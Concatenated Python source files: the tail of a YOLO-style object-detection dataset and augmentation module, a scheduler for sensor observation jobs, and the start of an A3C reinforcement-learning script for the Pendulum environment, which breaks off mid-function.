f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
if rank in [-1, 0]:
pbar.desc = 'Scanning labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
cache_path, nf, nm, ne, nd, n)
if nf == 0:
s = 'WARNING: No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
print(s)
assert not augment, '%s. Can not train without labels.' % s
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(8).imap(lambda x: load_image(*x), zip(repeat(self), range(n))) # 8 threads
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # img, hw_original, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
def cache_labels(self, path='labels.cache'):
# Cache dataset labels, check images and read shapes
x = {} # dict
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for (img, label) in pbar:
try:
l = []
im = Image.open(img)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
if os.path.isfile(label):
with open(label, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32) # labels
if len(l) == 0:
l = np.zeros((0, 5), dtype=np.float32)
x[img] = [l, shape]
except Exception as e:
print('WARNING: Ignoring corrupted image and/or label %s: %s' % (img, e))
x['hash'] = get_hash(self.label_files + self.img_files)
torch.save(x, path) # save for next time
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, len(self.labels) - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
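    # Jitter hue/saturation/value in place via per-channel lookup tables built from random gains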
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a mosaic
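    # Builds a 2s x 2s canvas from 4 images tiled around a random center (xc, yc),
    # shifting their labels into canvas pixel coordinates.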
labels4 = []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_perspective
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def replicate(img, labels):
# Replicate labels
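    # Copy the smaller half of the boxes to random positions in the image and
    # append matching labels (simple copy-paste style augmentation).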
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
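    # e.g. a 720x1280 frame with new_shape=640 and auto=True is resized to 360x640 and padded to 384x640 (stride-32 multiple)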
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 32), np.mod(dh, 32) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
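# Worked example of the padding arithmetic above (a sketch): letterboxing a
# 720x1280 (h x w) image to new_shape=640 with auto=True gives
#   r = min(640/720, 640/1280) = 0.5, new_unpad = (640, 360),
#   dw = 640 - 640 = 0, dh = 640 - 360 = 280 -> mod 32 -> 24,
# so after halving, 12 pixels of gray padding are added to both top and bottom
# and the function returns ratio = (0.5, 0.5) and padding (0.0, 12.0).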
def random_perspective(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
if perspective:
xy = (xy[:, :2] / xy[:, 2:3]).reshape(n, 8) # rescale
else: # affine
xy = xy[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# clip boxes
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=xy.T)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + 1e-16), h2 / (w2 + 1e-16)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + 1e-16) > area_thr) & (ar < ar_thr) # candidates
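# Worked example of the filter above (a sketch): a box that is 100x50 px before
# augmentation (box1) and 40x20 px after (box2) passes all three checks:
#   w2 = 40 > 2 and h2 = 20 > 2,
#   area ratio = (40 * 20) / (100 * 50) = 0.16 > 0.1,
#   aspect ratio = max(40/20, 20/40) = 2 < 20,
# so the corresponding target is kept by random_perspective().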
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
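# Sketch of the mask schedule above: `scales` yields 31 random masks per image
# (1 at 1/2 of the image size, 2 at 1/4, 4 at 1/8, 8 at 1/16 and 16 at 1/32),
# each filled with a random gray-ish color; after every mask with s > 0.03,
# labels whose boxes are more than 60% covered (intersection over label-box
# area) are dropped from the returned array.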
def reduce_img_size(path='path/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print('WARNING: image failure %s' % f)
def recursive_dataset2bmp(dataset='path/dataset_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='path/images.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
|
schedule.py
|
#!/usr/bin/env python3
"""Module for the scheduling of observations."""
__author__ = 'Philipp Engel'
__copyright__ = 'Copyright (c) 2019, Hochschule Neubrandenburg'
__license__ = 'BSD-2-Clause'
import copy
import logging
import threading
import time
from typing import Any, Callable, Dict, List
import arrow
from core.manager import Manager
from core.observation import Observation
from core.prototype import Prototype
class Job:
"""
Job stores an observation object and sends it to a callback function if the
current date and time are within the set schedule.
Args:
name: Name of the job.
port_name: Name of the (serial) port.
obs: Observation object.
is_enabled: If True, job is enabled.
start_date: Date to start the job.
end_date: Date to stop the job.
weekdays: Dict of days and times to run this job at.
uplink: Callback function to send the observation to.
"""
def __init__(self,
name: str,
port_name: str,
obs: Observation,
is_enabled: bool,
start_date: str,
end_date: str,
weekdays: Dict[str, List],
uplink: Callable[[str, Dict[str, Any], Dict[str, Any]], None]):
self._name = name # Name of the job.
self._port_name = port_name # Name of the port module.
self._obs = obs # Observation object.
self._is_enabled = is_enabled # Job is enabled or not.
self._weekdays = weekdays # The time sheet.
self._uplink = uplink # Callback function.
self.logger = logging.getLogger('job')
# Used date and time formats.
self._date_fmt = 'YYYY-MM-DD'
self._time_fmt = 'HH:mm:ss'
self._start_date = arrow.get(start_date, self._date_fmt)
self._end_date = arrow.get(end_date, self._date_fmt)
def has_expired(self) -> bool:
"""Checks whether or not the job has expired."""
now = arrow.now()
if now > self._end_date:
self.logger.debug(f'Job "{self._name}" has expired')
return True
return False
def is_pending(self) -> bool:
"""Checks whether or not the job is within the current time frame and
ready for processing."""
if not self._is_enabled:
return False
now = arrow.now()
# Are we within the date range of the job?
if self._start_date <= now < self._end_date:
# No days defined, go on.
if len(self._weekdays) == 0:
return True
# Name of the current day (e.g., "monday").
current_day = arrow.now().format('dddd').lower()
# Ignore current day if it is not listed in the schedule.
if current_day in self._weekdays:
# Time ranges of the current day.
periods = self._weekdays.get(current_day)
# No given time range means the job should be executed
# all day long.
if len(periods) == 0:
return True
# Check all time ranges of the current day.
if len(periods) > 0:
for period in periods:
# Start and end time of the current day.
start_time = arrow.get(period.get('startTime'),
self._time_fmt).time()
end_time = arrow.get(period.get('endTime'),
self._time_fmt).time()
# Are we within the time range of the current day?
if start_time <= now.time() < end_time:
return True
return False
def run(self) -> None:
"""Iterates trough the observation set and sends observations to an
external callback function."""
# Return if observation is disabled.
if not self._obs.get('enabled'):
return
# Disable the observation if it should run one time only.
if self._obs.get('onetime'):
self._obs.set('enabled', False)
# Make a deep copy, since we don't want to do any changes to the
# observation in our observation set.
obs_copy = copy.deepcopy(self._obs)
# Set the ID of the observation.
obs_copy.set('id', Observation.get_new_id())
# Insert the name of the port module or the virtual sensor at the
# beginning of the receivers list.
receivers = obs_copy.get('receivers')
receivers.insert(0, self._port_name)
obs_copy.set('receivers', receivers)
# Set the next receiver to the module following the port.
obs_copy.set('nextReceiver', 1)
self.logger.info(f'Starting job "{self._obs.get("name")}" for port '
f'"{self._port_name}" ...')
# Get the sleep time of the whole observation.
sleep_time = obs_copy.get('sleepTime', 0)
# Create target, header, and payload in order to send the observation.
target = self._port_name
header = Observation.get_header()
header['from'] = 'job'
payload = obs_copy.data
# Fire and forget the observation.
self._uplink(target, header, payload)
# Sleep until the next observation.
self.logger.debug(f'Next observation starts in {sleep_time} s')
time.sleep(sleep_time)
@property
def is_enabled(self):
return self._is_enabled
@property
def name(self):
return self._name
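# A minimal sketch of the `weekdays` structure consumed by Job.is_pending(); the
# day names and the 'startTime'/'endTime' keys follow the code above, while the
# concrete values are illustrative only and the constant is not used elsewhere.
EXAMPLE_WEEKDAYS = {
    'monday': [],                                                  # run all day
    'friday': [{'startTime': '08:00:00', 'endTime': '17:00:00'}],  # 8 am to 5 pm
}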
class Scheduler(Prototype):
"""
Scheduler is used to manage the monitoring process by sending observations
to a sensor. Each observation is represented by a single job. Jobs are
stored in a jobs list and will be executed at the given date and time. A
separate scheduler is necessary for each serial port.
The JSON-based configuration for this module:
Parameters:
port (str): Name of the port module.
sensor (str): Name of the sensor.
schedules (List[Dict]): List of schedules.
"""
def __init__(self, module_name: str, module_type: str, manager: Manager):
super().__init__(module_name, module_type, manager)
self._config = self.get_module_config('schedulers', self._name)
self._port_name = self._config.get('port')
self._sensor_name = self._config.get('sensor')
self._schedules = self._config.get('schedules')
self._thread = None
self._jobs = []
def add(self, job: Job) -> None:
"""Appends a job to the jobs list.
Args:
job: Job to add.
"""
self._jobs.append(job)
self.logger.debug(f'Added job "{job.name}" to scheduler "{self._name}"')
def load_jobs(self) -> None:
"""Loads all observation sets from the configurations and creates jobs
to put into the jobs list."""
# Run through the schedules and create jobs.
for schedule in self._schedules:
observations = schedule.get('observations')
# Get all observations of the current observation set.
for obs_name in observations:
obs = self._sensor_manager.get(self._sensor_name)\
.get_observation(obs_name)
if not obs:
self.logger.error(f'Observation "{obs_name}" not found')
continue
# Add sensor name to the observation.
obs.set('sensorName', self._sensor_name)
# Add project and node id.
obs.set('pid', self._project_manager.project.id)
obs.set('nid', self._node_manager.node.id)
# Create a new job.
job = Job(obs_name,
self._port_name,
obs,
schedule.get('enabled'),
schedule.get('startDate'),
schedule.get('endDate'),
schedule.get('weekdays'),
self.publish)
# Add the job to the jobs list.
self.add(job)
def run(self) -> None:
"""Threaded method to process the jobs queue."""
self.load_jobs()
zombies = []
# FIXME: Wait for uplink connection.
sleep_time = 5.0
self.logger.verbose('Starting jobs in {:3.1f} s ...'.format(sleep_time))
time.sleep(sleep_time)
while self.is_running:
t1 = time.time()
for job in self._jobs:
if job.has_expired():
zombies.append(job)
continue
if not job.is_enabled:
continue
if job.is_pending():
job.run()
# Remove expired jobs from the jobs list.
while zombies:
zombie = zombies.pop()
self._jobs.remove(zombie)
self.logger.debug(f'Deleted expired job "{zombie.name}"')
t2 = time.time()
dt = t2 - t1
if dt < 0.1:
time.sleep(0.1 - dt)
def start(self) -> None:
if self._is_running:
return
super().start()
# Run the method `run()` inside a thread.
self._thread = threading.Thread(target=self.run)
self._thread.daemon = True
self._thread.start()
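# A minimal sketch of the configuration consumed by Scheduler; the key names
# follow __init__() and load_jobs() above, the concrete values are illustrative:
#
#   {
#       "port": "com1",
#       "sensor": "stationA",
#       "schedules": [{
#           "enabled": true,
#           "startDate": "2019-01-01",
#           "endDate": "2019-12-31",
#           "weekdays": {},
#           "observations": ["obs1"]
#       }]
#   }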
|
a3c_for_pendulum.py
|
import threading
import multiprocessing
import tensorflow as tf
import numpy as np
import gym
import os
import shutil
import matplotlib.pyplot as plt
import time
GAME = 'Pendulum-v0'
OUTPUT_GRAPH = True
LOG_DIR = './log'
N_WORKERS = multiprocessing.cpu_count()
MAX_EP_STEP = 200
MAX_GLOBAL_EP = 4000 # 2000 4000
GLOBAL_NET_SCOPE = 'Global_Net'
GAMMA = 0.9
UPDATE_GLOBAL_ITER = 100
ENTROPY_BETA = 0.01 # 0.01 0.001
LR_A = 0.0001 # learning rate for actor
LR_C = 0.001 # learning rate for critic
# LR_A = 0.001 # learning rate for actor
# LR_C = 0.002 # learning rate for critic
GLOBAL_RUNNING_R = []
GLOBAL_EP = 0
env = gym.make(GAME)
N_S = env.observation_space.shape[0]
N_A = env.action_space.shape[0]
A_BOUND = [env.action_space.low, env.action_space.high] # bound of output action
class ACNet:
# This class is to define the global actor-critic and local actor-critics
def __init__(self, scope, globalAC=None):
if scope == GLOBAL_NET_SCOPE: # get global network
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
# Get parameters of the actor and critic in global network
self.a_params, self.c_params = self._build_net(scope)[-2:]
else: # local net, calculate losses
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_his = tf.placeholder(tf.float32, [None, N_A], 'A')
self.v_target = tf.placeholder(tf.float32, [None, 1], 'Vtarget')
mu, sigma, self.v, self.a_params, self.c_params = self._build_net(scope)
td = tf.subtract(self.v_target, self.v, name='TD_error')
with tf.name_scope('c_loss'):
# to minimize TD-error
self.c_loss = tf.reduce_mean(tf.square(td))
with tf.name_scope('wrap_a_out'):
mu, sigma = mu * A_BOUND[1], sigma + 1e-4
# distribution of parameters:mu, sigma
normal_dist = tf.distributions.Normal(mu, sigma)
with tf.name_scope('a_loss'):
log_prob = normal_dist.log_prob(self.a_his) # log pi(a)
exp_v = log_prob * tf.stop_gradient(td)
entropy = normal_dist.entropy() # encourage exploration:larger entropy means more stochastic actions
self.exp_v = ENTROPY_BETA * entropy + exp_v
self.a_loss = tf.reduce_mean(-self.exp_v)
# to maximize tf.reduce_mean(self.exp_v) <=> to minimize tf.reduce_mean(-self.exp_v)
with tf.name_scope('choose_a'): # use local params to choose action
self.A = tf.clip_by_value(tf.squeeze(normal_dist.sample(1), axis=[0, 1]), A_BOUND[0], A_BOUND[1])
with tf.name_scope('local_grad'):
self.a_grads = tf.gradients(self.a_loss, self.a_params)
self.c_grads = tf.gradients(self.c_loss, self.c_params)
with tf.name_scope('sync'):
with tf.name_scope('pull'): # assign the global network's parameters to each local network
self.pull_a_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.a_params, globalAC.a_params)]
self.pull_c_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.c_params, globalAC.c_params)]
with tf.name_scope('push'): # update the global network's parameters with the local network's gradients
self.update_a_op = OPT_A.apply_gradients(zip(self.a_grads, globalAC.a_params))
self.update_c_op = OPT_C.apply_gradients(zip(self.c_grads, globalAC.c_params))
def _build_net(self, scope):
w_init = tf.random_normal_initializer(0., .1)
with tf.variable_scope('actor'):
l_a = tf.layers.dense(self.s, 200, tf.nn.relu6, kernel_initializer=w_init, name='la')
mu = tf.layers.dense(l_a, N_A, tf.nn.tanh, kernel_initializer=w_init, name='mu')
sigma = tf.layers.dense(l_a, N_A, tf.nn.softplus, kernel_initializer=w_init, name='sigma')
with tf.variable_scope('critic'):
